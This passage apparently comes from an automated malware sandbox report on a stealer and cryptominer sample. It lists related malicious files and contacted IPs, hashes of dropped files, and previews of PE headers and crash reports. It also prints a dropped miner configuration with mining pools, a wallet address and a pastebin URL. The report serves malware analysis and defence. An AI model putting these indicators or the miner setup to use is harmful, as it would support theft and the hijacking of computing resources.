                                                                                                                                                    2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.96.1
                                                                                                                                                    https://qrsu.io/ONKMxGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.24.14
                                                                                                                                                    PO_L202503042.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.18.186.31
                                                                                                                                                    WHOLESALECONNECTIONSNLInstaller64x.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 185.215.113.51
                                                                                                                                                    SoftWare(2).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 185.215.113.51
                                                                                                                                                    Kiddion's Modest Menu v.1.0.0.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                    • 185.215.113.51
                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 185.215.113.39
                                                                                                                                                    Inst#U0430ll.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                    • 185.215.113.51
                                                                                                                                                    a0RkmvhSaf.exeGet hashmaliciousPhorpiexBrowse
                                                                                                                                                    • 185.215.113.66
                                                                                                                                                    Setup.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                    • 185.215.113.51
                                                                                                                                                    mQRr8Rkorf.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                                                                    • 185.215.113.16
                                                                                                                                                    random(1).exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                    • 185.215.113.115
                                                                                                                                                    random(4).exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 185.215.113.39
                                                                                                                                                    CLOUDFLARENETUSInstaller64x.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    setupx 2.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    ModMenu.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SoftWare(2).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 172.67.144.37
                                                                                                                                                    SoftWare(1).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.96.3
                                                                                                                                                    https://llttfr.boa.ink/?fr=gemma.inglis@heritageportfolio.co.ukGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.25.14
                                                                                                                                                    2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 104.21.96.1
                                                                                                                                                    https://qrsu.io/ONKMxGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.17.24.14
                                                                                                                                                    PO_L202503042.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.18.186.31
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0e2025 5595 TEKL#U0130F #U0130STE#U011e#U0130 - T#U00dcB#U0130TAK SAGE RFQ_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    Steam.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    SOA Since OCT DEC 241738316681530012900.batGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exeGet hashmaliciousGhostRat, ValleyRATBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    SecuriteInfo.com.Win32.DropperX-gen.23511.10885.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    #U70b9#U51fb#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U8bed#U8a00.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    #U70b9#U51fb#U6b64#U5904-#U5b89#U88c5#U7b80#U4f53#U4e2d#U6587#U53051.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    uy2g7z.batGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    PO-2513203-PDF.jsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    brave.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                    • 172.67.19.24
                                                                                                                                                    a0e9f5d64349fb13191bc781f81f42e1Installer64x.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    setupx 2.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    ModMenu.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SoftWare(2).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SimpleLoader v2.1.exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    SoftWare(1).exe1.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    script5.ps1Get hashmaliciousLummaC StealerBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    PO #S149102025.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    ppcore.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    ppcore.dll.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 188.114.97.3
                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    C:\ProgramData\Dllhost\WinRing0x64.sysKiddion's Modest Menu v.1.0.0.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                      stelarix.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                        nbtypsfikkad.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                          biopderfawd.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                            SecuriteInfo.com.Trojan.Inject5.18019.4796.15988.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                              vHl9kBfoX9.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                vHl9kBfoX9.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                  5JIEYPkSVW.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                    External.exe1.exeGet hashmaliciousXmrigBrowse
                                                                                                                                                                      Inst#U0430ll.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
                                                                                                                                                                        File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):14544
                                                                                                                                                                        Entropy (8bit):6.2660301556221185
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                        MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                        SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                        SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                        SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                        Joe Sandbox View:
                                                                                                                                                                        • Filename: Kiddion's Modest Menu v.1.0.0.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: stelarix.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: nbtypsfikkad.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: biopderfawd.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: SecuriteInfo.com.Trojan.Inject5.18019.4796.15988.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: vHl9kBfoX9.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: vHl9kBfoX9.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: 5JIEYPkSVW.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: External.exe1.exe, Detection: malicious, Browse
                                                                                                                                                                        • Filename: Inst#U0430ll.exe, Detection: malicious, Browse
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
                                                                                                                                                                        File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):881775
                                                                                                                                                                        Entropy (8bit):6.168193790981251
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:24576:gKpN5NsUPAFv5907H5iHxnY+9pB4j99p/BdJuvBLbh9TZbKs:ZpNHsUPAFM7H58nB9pB4j99p/BdJqLbx
                                                                                                                                                                        MD5:0464D0789E4F833F59B23197D409E960
                                                                                                                                                                        SHA1:71365D1765A59AE6C645918EFE4BF9D3D95F1A5D
                                                                                                                                                                        SHA-256:CEB4B81A126AEC0F59619205CF51EAB6C5712B4A97987BC8BA729A2991ED7B09
                                                                                                                                                                        SHA-512:F403567B5BA3E024CA5E860B3350D53CF57F8127063EBE7A4C3A67BA5B8ECB94EC7566C576AE9DE598FCED24446E1B2B9A983C471AC6ABE0BAC4E386CD490948
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....c.d...............&.._...}...2............@.............................0......L|~...`... .................................................F...@...\....v.................l...........................`.t.(......................@............................text....._......._.................`..`.data...`.... _...... _.............@....rdata.......0`......&`.............@..@.pdata........v.......v.............@..@.xdata........y.......x.............@..@.bss......2...|..........................idata...F......H....|.............@....CRT....h.... ........|.............@....tls.........0........|.............@....rsrc....\...@...\....|.............@....reloc..l............X}.............@..B........................................................................................................................................................................
                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\ZHKYZWVTC38PGAWGZF49K.exe
                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):344
                                                                                                                                                                        Entropy (8bit):5.688678537167479
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:6:DiYgE/ovKDMcPmriYgE/ovKDMcBCrT5fhXGT2QSBa5ydXnzAiGUlQPoy68f1KAK3:uwgyXmGwgyoH55GT2Qtyc3n1KAU
                                                                                                                                                                        MD5:1A4E05716C2A8B7A5F34172178340305
                                                                                                                                                                        SHA1:2E1A747A57E99B7FA2F691568104C5431F79A849
                                                                                                                                                                        SHA-256:FB42753CE0F515D7E4BF6B3C86895CC14FC59BE6A1A81D429A34B88F48286173
                                                                                                                                                                        SHA-512:41D18BDA9117C3F0162F5ACA3C63FE139A38ED4A419619992C258CF1107BF4C2D0EC9B9CFB402D19347FE4C50CFEA0ED6FBD4602781027B725463C613E0837CA
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..ETCHASH..etc.2miners.com:1010..0x7fe2496e102A4E43617eb2E95B5d1D1C3f6Db972..XMR..pool.hashvault.pro:443..ZEPHYR3c6xGj8D5oP4tzKQbPn2dNdse6aPRWxNBiwBFrg7RFN4jf1cqgj5qdR9Wdru44g2FATJHHH38oFDTH6krgKntSzLc5Csy3t..Dnepr..F(Ff4f67h((jgf..cp..https://pastebin.com/raw/YpJeSRBC..
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):65536
                                                                                                                                                                        Entropy (8bit):0.9188424869741152
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:xBDOEg1WY5C0BU/eacjICBqzuiF4Z24IO82j4k:jOb1WY5JBU/eacjIHzuiF4Y4IO82j4
                                                                                                                                                                        MD5:75C305D7C7677906C3F63A18405138AE
                                                                                                                                                                        SHA1:26B4B0F8C2A19CABCE4245E498D086AAD1A80502
                                                                                                                                                                        SHA-256:682D48ED40729E7CB38E8523C02859D7F85194ECF53133856C5637EC9BF7BD01
                                                                                                                                                                        SHA-512:5A1E8F7D64F19914A1E98FAF6A7A3A6132A12B4D191174930E2185AB30945A56CAD59C111EAE69954E381B9B6CADE67D15AEE7729D73E01BB2CDC415759D2280
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.3.4.2.8.1.6.2.1.5.8.0.7.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.3.4.2.8.1.6.8.8.7.6.7.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.d.0.a.c.4.0.5.-.4.3.3.5.-.4.8.d.1.-.8.c.e.2.-.e.d.3.7.6.d.3.3.9.f.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.d.2.e.8.e.4.-.0.d.9.b.-.4.9.1.e.-.9.7.8.f.-.5.1.7.d.e.8.d.3.8.8.d.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.e.t.u.p.x. .1...e.x.e.1...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.1.4.-.0.0.0.1.-.0.0.1.8.-.6.2.2.8.-.6.c.2.3.1.4.9.4.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.e.3.f.3.4.5.5.5.d.4.7.8.7.5.5.f.f.0.b.3.0.2.2.e.f.6.4.a.8.e.6.0.0.0.0.f.f.f.f.!.0.0.0.0.8.6.a.b.8.3.6.8.a.7.2.f.9.4.9.0.c.1.7.5.d.e.5.0.3.2.c.2.b.9.f.2.a.2.1.9.f.0.e.e.!.s.e.t.u.p.x. .1...e.x.e.1...e.x.e.....T.a.r.g.e.t.A.p.
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:Mini DuMP crash report, 14 streams, Thu Mar 13 12:33:36 2025, 0x1205a4 type
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):31446
                                                                                                                                                                        Entropy (8bit):2.2166951612958057
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:Fuyh1eXNr+XMUAsOYs3WslTHOgSKjnIXJF0JJ:HhWrvxjL3WyTJjnX
                                                                                                                                                                        MD5:19201D9D42A0FDBAD93D4D91450A7F0F
                                                                                                                                                                        SHA1:25A3DB362B6FA4A519970D959C2342C11C2D853F
                                                                                                                                                                        SHA-256:67A3F9346CFCE0DEEE80CB0F769567E37A6DA6FDB11E09A1E8E91F3A4604C096
                                                                                                                                                                        SHA-512:779D19B8CEDE459909491929C6E897C4451561D952987E09CD494DDAD8DF5F81DD4914C4274872191F96206AC63D622426232313E5E8DAB93A3E15C111EDAEA8
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:MDMP..a..... ..........g............4...............<.......T...F'..........T.......8...........T...........h...n_..........<...........(...............................................................................eJ..............GenuineIntel............T..............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):8420
                                                                                                                                                                        Entropy (8bit):3.6976593438302188
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:192:R6l7wVeJ1706EP6YNlSU9xDgmfQ94prY89boPsfMYm:R6lXJ1I6M6Y/SU9xDgmfQ9Yo0fy
                                                                                                                                                                        MD5:F7832FACCD2BBFBBAF6EFD0CE321D12E
                                                                                                                                                                        SHA1:4F6B1277DD03246717D75A1B8FEE4E8E0AC30689
                                                                                                                                                                        SHA-256:FFFC4F4A0EB3348D731776C7C7F433E72796948547F85F83F0705942A04B9F8A
                                                                                                                                                                        SHA-512:F4507CBEC10A4C6C442BE2DD708783A79BEE42B677BCFC4E64F01121BFD352277A1B2AB7CE3756502D61779E3656B4023FB311FA8468BAF134EF93324F681ECF
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.6.7.6.<./.P.i.
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):4735
                                                                                                                                                                        Entropy (8bit):4.47638974130953
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:cvIwWl8zsQtJg77aI9rjUWpW8VYDLPYm8M4Jz9FN+q8vJ3HMD1R4d:uIjfWI7VN7V+SJJKJMD1R4d
                                                                                                                                                                        MD5:E5C54A966691DE3720DE499C6826AC49
                                                                                                                                                                        SHA1:05C3249D715FD8C8152CBA59F9C07229217CABF2
                                                                                                                                                                        SHA-256:38EBCD486E2724F627B4826B2905ECDBBE2FF53BBA1DBD6C69BA1FB2E2DCC1CB
                                                                                                                                                                        SHA-512:AA2BC6D2F870913C8AC90971E06BE6A876E4670C842D2A39FF68789B0AE93D4292A6BEED31FA1F88C387959573A56634A4DD074315CFCE39785451571AAE0D86
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="759096" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:data
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):2232
                                                                                                                                                                        Entropy (8bit):5.380747059108785
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:48:lylWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZPUyut:lGLHxvIIwLgZ2KRHWLOugbt
                                                                                                                                                                        MD5:7B68955B5D2784008174D2F28F3A919C
                                                                                                                                                                        SHA1:42FF3A1CC507BC0DED73BB414DC3DF8D7EC5A667
                                                                                                                                                                        SHA-256:BCFB8DEDCF9BFF1C0E59BC069AD4BFD15873AB22CA69D280044C808BA92ADD08
                                                                                                                                                                        SHA-512:4D2816F2ECE76889F6D06A3DB451267CCCB7B598494116AC6446E493B3EFD57BF2B0A206F15B49A765729719F63194F82E1318C69010FDA7D3725EE117EC79E1
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                                                        Process:C:\Users\user\Desktop\setupx 1.exe1.exe
                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                        Category:modified
                                                                                                                                                                        Size (bytes):21504
                                                                                                                                                                        Entropy (8bit):5.163407645311707
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:384:DbjjHZQ3N5ofJHFrybCN906pXtM5PFNwN9zmuM15/ufjWrynX:DbjjHe38BgbGqBFNwvsNe
                                                                                                                                                                        MD5:C11A82D699A06D9B8BA4296E0C562AE4
                                                                                                                                                                        SHA1:E91963FE8DEF3ED151333A6A66D005237600BA30
                                                                                                                                                                        SHA-256:483B1D7DAC70DE82E9B22A0C1ED775CF7E10B0A3790C5AA1B9215DBCD1754302
                                                                                                                                                                        SHA-512:CC8644279EA2CEBF70F594F6CC48D6EBBC10D036B7DCF1008FC05565DA85CC36F7E8AF7FAA49B7C117C9A6AC94D7C007A99B53EC1DD668A7F8C28DC25B410A54
                                                                                                                                                                        Malicious:true
                                                                                                                                                                        Antivirus:
                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX!..........."...0..H..........:f... ........@.. ....................................`..................................e..O...................................4e..8............................................ ............... ..H............text...@F... ...H.................. ..`.rsrc................J..............@..@.reloc...............R..............@..B.................f......H........6...,...........c..p............................................0............}.....(.......(.....(.....(......(......(.....~....r...po......,0.~....~....r...p.(.....~....~....r#..p.(......+..~....~....r...p.(......~....~....rC..p.(.....(.....(......(.....*....0..!.........(......%o.... ....`o.......+..*....0............ ....(..... .'...1........s......~....o........s.........r[..p.+....X......o....%............-......8...............E............!.../...:...E...P...[
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                        Malicious:false
                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                        Category:dropped
                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                        Encrypted:false
                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
